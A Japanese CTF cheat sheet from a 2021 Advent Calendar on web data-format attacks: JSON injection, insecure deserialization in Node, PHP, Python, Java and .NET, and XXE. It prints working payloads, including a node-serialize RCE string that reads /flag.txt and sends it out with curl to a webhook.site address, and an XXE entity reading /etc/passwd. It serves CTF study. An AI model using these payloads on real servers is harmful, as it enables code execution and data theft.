この記事はCTFのWebセキュリティ Advent Calendar 2021の4日目の記事です。

本まとめはWebセキュリティで共通して使えますが、セキュリティコンテスト（CTF）で使うためのまとめです。
悪用しないこと。勝手に普通のサーバで試行すると犯罪です。

データ形式

• Web上では様々なデータ形式が利用される。これらのデータ形式には固有の問題がいくつかあり、脆弱性を意識して利用する必要がある
• インジェクション
  • どのようなデータ形式でもバリデーションとかサニタイズせずに入れると、構造を変化させて、想定外動作を引き起こす可能性がある
• Insecure Deserialization
  • 入力されたシリアライズドデータをサーバ側で処理する過程、デシリアライズの段階で意図せぬ処理を引き起こさせること
  • RCEできたりする（RCEはWebサーバ上で自由にコマンド実行ができてしまうということ）

JSON

• インジェクション/JSON Interoperability
  • JSONの構造を書き換えて属性を追加したり、同一キーを複数個入れることでSmugglingを狙うものがある
  • An Exploration of JSON Interoperability Vulnerabilities
    • {"id": 1, "id": 2}がJSONパーサーによって解釈違いを引き起こす
• Insecure Deserialization
  • nodejsのnode-serialize
    • ベースを作って、書き換えたい部分を即時実行関数式に変換する
    • CTFtime.org / Zh3r0 CTF V2 / sparta
      • {"rce":"_$$ND_FUNC$$_function (){require('child_process').exec('ls /', function(error, stdout, stderr) {console.log(stdout) }); }()"}
      • city=_$$ND_FUNC$$_function(){require(\"child_process\").exec(\"output=$(cat /flag.txt);curl webhook.site/9d7268ea-42bd-48b3-9ede-0be524e773e1?out=$output\",function(error, stdout, stderr) { console.log(stdout)});}()
        • 実行して適当な所に送るやつ
      • {"username":{"toString":"_$$ND_FUNC$$_(()=>{throw require('child_process').execSync('cat /flag.txt')})()"}}
  • nodejsのjavascript-serializer
    • toStringを入れることで文字列として使用される場合に任意コマンド実行される
    • "evil": { "toString": { "___js-to-json-class___": "Function", "json": "console.log('hello!');return'res';" } }
• JSONP
  • JSONをvbscriptとして読み込ませるJSONハイジャック(CVE-2013-1297)に注意 | 徳丸浩の日記
  • XSSI and JSONP leaks · EdOverflow/bugbountywiki Wiki
    • ここにあるように適当にCSRFできそうなサイトを立ち上げて踏ませれば、相手権限で得たレスポンスを抜き取れる
  • JSONPは危険なので禁止 – yohgaki's blog
• JWT → 別途
• メモ
  • JSONで制御文字を入れ込むときはunicode表現にして入れる {"username": "admin\u0000"}

XML

• XMLそのものとして使われる場合もあるし、RSS,SAML,SVG,Microsoft Officeファイルの一部として現れても来る
• XXE
  • XMLの脆弱性と言えばコレ。XMLの外部エンティティ参照を対象とした脆弱性を狙う攻撃であり、LFIをしたり、RCEをしたり、SSRFをしたりできる
  • LFI
    • <!DOCTYPE x [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>と書いて&xxe;を埋め込む
    • エラー経由でのLFI
      • Full Local File Read via Error Based XXE using XLIFF File | pwn.vg
      • エラーが出る場所があれば、そこに埋め込むことでエラーメッセージから情報流出させることができる
  • RCE
    • まだ、自分はやったことないが、RCEできるらしい。
    • expect://idでidコマンドが動くかを確かめる
    • From XXE to RCE with PHP/expect — The Missing Link - Airman - Medium
  • SSRF
    • Full Local File Read via Error Based XXE using XLIFF File | pwn.vg
      • 以下で反応が来るかどうかでSSRFわかる
  • DoS
    • デシリアライズ時に結果が膨大となるボムが存在する
    • XML Bombあるいはeneity explosionと呼ばれる。
    • Algorithmic complexity attackの一種で、組合せ爆発を引き起こすことで負荷をかける。
    • Billion laughs attack - Wikipedia
  • 多段XXE
    • Detecting Chained XXE (XML External Entity) to DOS (Denial of Service) or SSRF (Server Side Request Forgery) using ShiftLeft Ocular | by Chetan Conikee | Medium
    • WreckTheLine writeups
  • XMLを含むファイルを入れ込む時
    • xmlに含まれるような文字列を含んだファイルをfile://とかでインジェクションしようとすると失敗する。
    • What Are XML External Entity (XXE) Attacks
    • ここに外部DTDファイルを読み込むことで回避する方法が紹介されている。
  • XXE on JSON Endpoints
    • jsonをPOSTで受け取る部分は実はXMLにしても受け取れる状態になっててXXEできないかというもの
    • この受け取れる状態というのはフレームワークによってはどっちでもOK状態になっているのではないかと推測
  • SVG CTFtime.org / P.W.N. CTF / SVG2PNG / Writeup
  • docx
    • docemを使ってpackingし直す
      1. ベースのdocxファイルをzip拡張子に変えて解凍
      2. 中身をXXEで改変
      3. docemを使って再pack python ./docem.py -s evil -sx docx
         • evilはevilフォルダでtempフォルダに結果が出力される
    • wavファイルでXXE
      • WordPress の XXE(CVE-2021-29447) やる - まったり技術ブログ%E3%82%84%E3%82%8B)
      • wavファイルにはxmlでメタデータを記載するiXMLチャンクというのが指定できる。ここでXXEする
        • ファイル出力されてこないのでBlind XXEをしてOOBの要領で情報を抜き出す
  • Blind XXE
    • WordPress の XXE(CVE-2021-29447) やる - まったり技術ブログ%E3%82%84%E3%82%8B)
    • SonarSource Blog » WordPress 5.7 XXE Vulnerability
    • What is a blind XXE attack? Tutorial & Examples | Web Security Academy
  • 参考
    • 詳解セキュリティコンテストのXXEが日本語で最も詳しいと思う
    • わかりやすすぎる https://www.slideshare.net/ebihara/phpcon-20
    • XXE攻撃 基本編 | MBSD Blog
    • EXPLOITING XXE IN FILE UPLOAD FUNCTIONALITY
    • XXE in IIS/.NET: SANS Penetration Testing | Exploiting XXE Vulnerabilities in IIS/.NET | SANS Institute
• Insecure Deserialization
  • ライブラリによるかもしれないが、RCEまでつなげるにはGadget Chainをつなげる必要がある
  • GadgetというのはInsecure Deserializationによって呼出可能で、かつ、コマンド実行につなげることができるクラスやライブラリのことを言う
    • なのでRCEできるのは、Insecure Deserialization脆弱性がある、かつ、Gadget Chainとして呼出可能ならGadgetが存在する場合になる
    • Gadgetという言葉の意味する所の把握が難しいが、Prototype Pollutionとかでも出てくるからふんわり意味を理解しておくと情報が入ってきやすくなる
• SAML Injection
  • SAML XML Injection – NCC Group Research

他のInsecure Deserialization

• pythonのpickle
  • pickleとはpythonのインスタンスをシリアライズしてくれるもの
  • OWASP Insecure Deserialization with Python | David Mata blog
  • not enough values to unpack (expected 3, got 2)というエラーはpickleっぽい
  • __reduce__メソッドはpickle.loadするときに発動して、文字列に入れ替わる
  • pickle.load(ここ！)に対してインジェクションできれば、発動させられる
• phpのserialize/unserialize
  • 外部からデシリアライズするデータを渡せるとき、意図しないクラスの意図しない状態のインスタンスを生成するテク 徳丸さん記事 OWASP
  • オブジェクトの変数（プロパティ）をインジェクションできる
    • デシリアライズ時に__constructは呼ばれない
    • だが、__destructや特殊な関数は呼ばれる可能性があり、そこでインジェクションしておいた変数の値を使って、いろんなことを行う ここに網羅されてる
      • とりあえず__wakeup()と__destruct()が呼ばれる
  • Remote code execution through unsafe unserialize in PHP
    • PHPでも、Gadget chainがある
  • シリアライズされたものに含めることができるのは変数だけ。変数を入れこむ感じでシリアライズする。
  • protectedの変数の場合は変数名に特殊文字が入り込むので、シリアライズ化するときはurlencodeして取り出したほうが、おかしくなりにくい
  • 問題
    • websec level04
    • CTFtime.org / Kaspersky Industrial CTF 2018 / expression
• Phar, PHPアーカイブ
  • Exploiting PHP Deserialization: CCCamp19 CTF PDFCreator Challenge
  • Exploiting PHP Phar Deserialization Vulnerabilities: Part 1 | Keysight Blogs
  • CTFtime.org / Tenable CTF 2021 / Phar out
• ASP.NET
  • Unsafe ViewState Deserializationがあるっぽい
    • Exploiting ViewState Deserialization using Blacklist3r and YSoSerial.Net - NotSoSecure
• Unsafe Java Object Deserialization
  • .NETのときと同様にgadget chainしてコード実行に持ち込む
    • GitHub - frohoff/ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
  • Java Deserialization — From Discovery to Reverse Shell on Limited Environments | by Francesco Soncina (phra) | ABN AMRO — Red Team | Medium
    • change Runtime exec(String) to exec(String[]) · Issue #71 · frohoff/ysoserial · GitHub
    • code white | Blog: $@|sh – Or: Getting a shell environment from Runtime.exec
  • Javaの安全でないデシリアライゼーションの攻撃に、ysoserialがよく使用される https://github.com/frohoff/ysoserial
    • ysoserialをforkしてpayloadを追加するなど機能拡張しているリポジトリが公開されている（特にTomcatにメモリWebShellを設置する機能追加が多い）
      • Tomcatのセミユニバーサルエコー方式
        • 解説記事：https://xz.aliyun.com/t/7348
        • リポジトリ：https://github.com/kingkaki/ysoserial
      • グローバルストレージに基づく新しいアイデア|一般的なエコー方式に関するTomcatの調査
        • 解説記事：https://mp.weixin.qq.com/s?__biz=MzIwMDk1MjMyMg==&mid=2247484799&idx=1&sn=42e7807d6ea0d8917b45e8aa2e4dba44
        • リポジトリ：https://github.com/Litch1-v/ysoserial
      • TomcatベースのメモリWebshel​​lファイルレス攻撃テクノロジー
        • 解説記事：https://xz.aliyun.com/t/7388
        • リポジトリ：https://github.com/threedr3am/ysoserial
      • CommonsBeanutilsとcommons-collectionsを使用しないShiroの逆シリアル化の利用
        • https://www.leavesongs.com/PENETRATION/commons-beanutils-without-commons-collections.html
        • https://github.com/phith0n/JavaThings
• Rails
  • Deserialization on Rails